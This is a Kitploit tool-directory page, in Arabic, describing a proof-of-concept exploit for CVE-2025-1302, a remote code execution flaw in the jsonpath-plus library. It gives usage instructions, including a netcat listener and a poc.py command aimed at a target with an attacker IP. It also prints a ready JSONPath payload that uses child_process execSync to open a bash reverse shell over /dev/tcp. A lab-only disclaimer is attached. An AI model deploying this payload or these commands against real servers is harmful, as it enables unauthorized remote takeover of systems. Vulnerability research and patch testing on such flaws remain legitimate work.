Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — استغلال PoC وعرض توضيحي لخادم ضعيف لـ CVE-2025-1302 في jsonpath-plus. | Kitploit
أدوات/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

استغلال PoC وعرض توضيحي لخادم ضعيف لـ CVE-2025-1302 في jsonpath-plus.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-1302 JSONPath-Plus إثبات المفهوم للثغرة RCE

اسم سكريبت الـPoC: poc.py

سكريبت استغلال لإثبات المفهوم للثغرة CVE-2025-1302، والتي تستهدف ثغرة تنفيذ أوامر عن بعد (RCE) في مكتبة jsonpath-plus. عند تشغيله على نقطة نهاية خدمة ضعيفة، يحاول السكريبت تشغيل تنفيذ أوامر عن بعد عبر حمولة JSONPath وإنشاء شل عكسي (reverse shell) إلى المهاجم.


المميزات

  • طرق HTTP مرنة: يدعم POST و GET أو AUTO (POST مع الرجوع إلى GET) عبر خيارين --method أو --no-fallback.
  • حمولات مخصصة: تحميل قالب أو أكثر من قوالب حمولات JSONPath RCE من ملف، مع استخدام {ip} و {port} كقوالب.
  • حمولة افتراضية مدمجة: إذا لم يتم توفير ملف حمولة، يستخدم قالب شل عكسي bash كامل التكوين.
  • تصحيح أخطاء مفصل: يطبع نص الطلب والاستجابة الكاملين لمحاولات POST و GET عندما تفشل.
  • مؤشرات التقدم: يعرض شريط تقدم tqdm أثناء حلقات التأخير والحمولات.
  • تسجيل: حفظ جميع النتائج اختيارياً في ملف JSON باستخدام --output.
  • التثبيت

    1. استنساخ هذا المستودع:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. تثبيت التبعيات (يتطلب بايثون 3.6+):

      root@kitploit:~
      pip install -r requirements.txt
      

    الاستخدام

    1. تشغيل مستمع على جهاز المهاجم (استبدل المنفذ حسب الحاجة):

      root@kitploit:~
      nc -lvnp 9999
      
    2. تشغيل الـPoC:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: ملف يحتوي على حمولة JSONPath واحدة في كل سطر. استخدم العناصر النائبة {ip} و {port}.
    • --delay: الثواني التي يجب الانتظار قبل إرسال الحمولات (يظهر العد التنازلي).
    • --method: فرض POST أو GET أو AUTO (الافتراضي).
    • --no-fallback: اختصار لتخطي أي إعادة محاولة GET (مكافئ لـ --method POST).
    • --output: المسار لحفظ سجل المحاولات بصيغة JSON.

    مثال لملف الحمولة

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    المساهمة

    1. إنشاء fork للمستودع وإنشاء فرع (branch) جديد للميزة.
    2. تقديم طلب سحب (pull request) مع تغييراتك.

    إخلاء المسؤولية

    استخدم هذا السكريبت فقط في بيئات مختبرية خاضعة للرقابة ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها. قد يكون إساءة الاستخدام غير قانونية وغير أخلاقية.

    تنزيل الأداة